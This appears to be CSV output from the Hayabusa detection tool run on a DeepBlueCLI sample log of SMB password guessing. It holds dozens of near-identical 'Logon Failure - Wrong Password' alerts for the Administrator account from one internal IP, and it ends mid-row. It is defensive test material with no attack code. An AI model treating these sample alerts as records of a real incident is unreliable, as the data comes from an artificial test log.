NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1BmnyTsmP2XqMzf1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB3xsYe3RcPXhDib | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxN9i8exdO2h4oa7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjcQaeuo4f8wFXhv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
